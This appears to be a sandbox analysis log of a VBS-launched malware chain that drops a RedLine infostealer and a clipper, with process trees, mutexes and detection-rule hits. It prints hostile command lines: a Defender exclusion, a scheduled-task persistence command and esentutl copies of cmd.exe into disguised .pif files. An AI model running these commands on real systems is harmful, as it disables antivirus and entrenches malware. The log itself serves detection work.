                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DC894C appears 56 times
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: String function: 0040E1D8 appears 43 times
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: String function: 02CE46D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: String function: 02CE4860 appears 683 times
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: String function: 02CF894C appears 50 times
                      Source: IBKB.vbsInitial sample: Strings found which are bigger than 50
                      Source: 19.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 9.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 9.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 24.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 24.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 19.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@41/22@69/17
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB7FD2 GetDiskFreeSpaceA,2_2_02DB7FD2
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,9_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC6DC8 CoCreateInstance,2_2_02DC6DC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,9_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0084CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,9_2_0084CBD0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9aa529efaf59dc673779169-b
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9aa529efaf59dc6-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCommand line argument: 08A9_2_00413780
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: IBKB.vbsReversingLabs: Detection: 39%
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_8-540
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /oJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
